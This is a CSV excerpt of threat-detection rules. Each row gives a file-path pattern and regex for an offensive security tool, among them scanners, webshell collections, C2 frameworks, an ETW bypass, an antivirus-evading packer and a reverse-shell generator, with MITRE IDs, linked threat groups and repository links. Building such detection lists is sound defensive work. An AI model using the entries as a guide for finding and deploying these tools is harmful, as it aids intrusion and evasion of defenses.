"*/fscan_freebsd_arm64*",".{0,1000}\/fscan_freebsd_arm64.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#linux","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","7284"
"*/fscan_mac_arm64*",".{0,1000}\/fscan_mac_arm64.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#linux","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","7285"
"*/fscan32 *",".{0,1000}\/fscan32\s.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#linux","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","7286"
"*/fscan32.exe*",".{0,1000}\/fscan32\.exe.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","1","N/A","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","7287"
"*/fscan386 *",".{0,1000}\/fscan386\s.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#linux","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","7288"
"*/fscan64.exe*",".{0,1000}\/fscan64\.exe.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","1","N/A","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","7289"
"*/fscanamd64 *",".{0,1000}\/fscanamd64\s.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#linux","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","7290"
"*/fscanarm64.exe*",".{0,1000}\/fscanarm64\.exe.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","1","N/A","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","7291"
"*/fscanarmv6.exe*",".{0,1000}\/fscanarmv6\.exe.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","1","N/A","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","7292"
"*/fscanarmv7.exe*",".{0,1000}\/fscanarmv7\.exe.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","1","N/A","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","7293"
"*/ft-linux-x64 *",".{0,1000}\/ft\-linux\-x64\s.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","#linux","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","7294"
"*/ftp-anon.nse*",".{0,1000}\/ftp\-anon\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7295"
"*/ftp-bounce.nse*",".{0,1000}\/ftp\-bounce\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7296"
"*/ftp-brute.nse*",".{0,1000}\/ftp\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7297"
"*/FtpC2/*",".{0,1000}\/FtpC2\/.{0,1000}","offensive_tool_keyword","SharpFtpC2","A Streamlined FTP-Driven Command and Control Conduit for Interconnecting Remote Systems.","T1572 - T1041 - T1105","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/DarkCoderSc/SharpFtpC2","1","1","N/A","N/A","10","10","88","15","2023-11-09T10:37:20Z","2023-06-09T12:41:28Z","7298"
"*/ftp-libopie.nse*",".{0,1000}\/ftp\-libopie\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7299"
"*/ftp-proftpd-backdoor.nse*",".{0,1000}\/ftp\-proftpd\-backdoor\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7300"
"*/ftp-syst.nse*",".{0,1000}\/ftp\-syst\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7301"
"*/ftp-vsftpd-backdoor.nse*",".{0,1000}\/ftp\-vsftpd\-backdoor\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7302"
"*/ftp-vuln-cve2010-4221.nse*",".{0,1000}\/ftp\-vuln\-cve2010\-4221\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7303"
"*/fuck.php*",".{0,1000}\/fuck\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","7304"
"*/Fuck-Etw.git*",".{0,1000}\/Fuck\-Etw\.git.{0,1000}","offensive_tool_keyword","Fuck-Etw","Bypass the Event Trace Windows(ETW) and unhook ntdll.","T1070.004 - T1055.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/unkvolism/Fuck-Etw","1","1","N/A","N/A","10","2","102","13","2023-09-29T21:19:10Z","2023-09-25T18:59:10Z","7305"
"*/FuckThatPacker*",".{0,1000}\/FuckThatPacker.{0,1000}","offensive_tool_keyword","cobaltstrike","A simple python packer to easily bypass Windows Defender","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Unknow101/FuckThatPacker","1","1","N/A","N/A","10","10","637","84","2022-04-03T18:20:01Z","2020-08-13T07:26:07Z","7306"
"*/fudge_c2.sql*",".{0,1000}\/fudge_c2\.sql.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","#linux","N/A","10","10","253","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z","7307"
"*/FudgeC2*",".{0,1000}\/FudgeC2.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","N/A","10","10","253","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z","7308"
"*/fuegoshell.git*",".{0,1000}\/fuegoshell\.git.{0,1000}","offensive_tool_keyword","fuegoshell","Fuegoshell is a powershell oneliner generator for Windows remote shell re-using TCP 445","T1059.001 - T1203","TA0002 - TA0011 - TA0008","N/A","N/A","Lateral Movement","https://github.com/v1k1ngfr/fuegoshell","1","1","N/A","N/A","10","1","44","7","2024-04-27T09:03:28Z","2024-04-27T08:06:03Z","7309"
"*/full-nelson.c*",".{0,1000}\/full\-nelson\.c.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","7310"
"*/full-nelson64*",".{0,1000}\/full\-nelson64.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","7311"
"*/FullPowers.dll*",".{0,1000}\/FullPowers\.dll.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","7312"
"*/FunctionalC2/*",".{0,1000}\/FunctionalC2\/.{0,1000}","offensive_tool_keyword","FunctionalC2","A small POC of using Azure Functions to relay communications","T1021.006 - T1132.002 - T1071.001","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/FortyNorthSecurity/FunctionalC2","1","1","N/A","N/A","10","10","74","17","2023-03-30T20:27:38Z","2020-03-12T17:54:50Z","7313"
"*/fuzz.txt*",".{0,1000}\/fuzz\.txt.{0,1000}","offensive_tool_keyword","fuzz.txt","list of sensible files for fuzzing in system","T1210 - T1190 - T1203 - T1114","TA0002 - TA0003 - TA0007 - TA0040","N/A","N/A","Exploitation tool","https://github.com/Bo0oM/fuzz.txt/blob/master/fuzz.txt","1","1","N/A","N/A","N/A","10","3134","514","2025-03-27T08:34:43Z","2016-01-19T13:35:44Z","7314"
"*/fuzz_wordlist.txt*",".{0,1000}\/fuzz_wordlist\.txt.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","1","#linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","7315"
"*/fuzzers/dns*",".{0,1000}\/fuzzers\/dns.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","7316"
"*/fuzzers/ftp*",".{0,1000}\/fuzzers\/ftp.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","7317"
"*/fuzzers/http*",".{0,1000}\/fuzzers\/http.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","7318"
"*/fuzzers/ntp*",".{0,1000}\/fuzzers\/ntp.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","7319"
"*/fuzzers/smb*",".{0,1000}\/fuzzers\/smb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","7320"
"*/fuzzers/smtp*",".{0,1000}\/fuzzers\/smtp.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","7321"
"*/fuzzers/ssh*",".{0,1000}\/fuzzers\/ssh.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","7322"
"*/FWUprank.ps1",".{0,1000}\/FWUprank\.ps1","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","7323"
"*/g00nv13.php*",".{0,1000}\/g00nv13\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","7324"
"*/G0ldenGunSec/*",".{0,1000}\/G0ldenGunSec\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF to identify processes with the CLR loaded with a goal of identifying SpawnTo / injection candidates.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://gist.github.com/G0ldenGunSec/8ca0e853dd5637af2881697f8de6aecc","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","7325"
"*/GadgetToJScript.git*",".{0,1000}\/GadgetToJScript\.git.{0,1000}","offensive_tool_keyword","GadgetToJScript","A tool for generating .NET serialized gadgets that can trigger .NET assembly load/execution when deserialized using BinaryFormatter from JS/VBS/VBA based scripts.","T1059.001 - T1078 - T1059.005","TA0002 - TA0004 - TA0001","N/A","N/A","Exploitation tool","https://github.com/med0x2e/GadgetToJScript","1","1","N/A","N/A","10","10","942","168","2021-07-26T17:35:40Z","2019-10-05T12:27:19Z","7326"
"*/gandcrab.profile*",".{0,1000}\/gandcrab\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","362","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z","7327"
